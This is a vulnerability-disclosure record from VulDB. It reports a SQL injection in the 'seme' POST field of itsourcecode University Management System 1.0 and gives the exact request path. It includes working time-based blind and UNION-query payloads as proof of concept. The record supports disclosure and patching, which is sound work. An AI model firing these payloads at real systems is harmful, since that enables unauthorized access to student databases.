| Title | itsourcecode University Management System 1.0 SQLi |
|---|
| Description | Register and log in with a student account, and in the student account's backend, visit "/view_single_result.php?vr=123321&vn=mirage," where "vr" refers to the StudentID and "vn" to the student's name. Click the "view Result" button. There is an SQL injection vulnerability in the "seme" field of the POST data packet sent.
POC:
Parameter: seme (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: seme=1st' AND (SELECT 4900 FROM (SELECT(SLEEP(5)))IWYu) AND 'sLik'='sLik
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: seme=1st' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b7a7171,0x424b4d66785475486669785141445a6a4e4f72774d675543446e585856446d686c56674b58685a57,0x7176767871),NULL-- - |
|---|
| Source | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE6-1.md |
|---|
| User | Dee.Mirage (UID 71702) |
|---|
| Submission | 2024-07-18 08時40分 (12 月前) |
|---|
| Moderation | 2024-07-20 16時14分 (2 days later) |
|---|
| Status | 已接受 |
|---|
| VulDB Entry | 272074 [itsourcecode University Management System 1.0 view_single_result.php?vr=123321&vn=mirage seme SQL注入] |
|---|
| Points | 20 |
|---|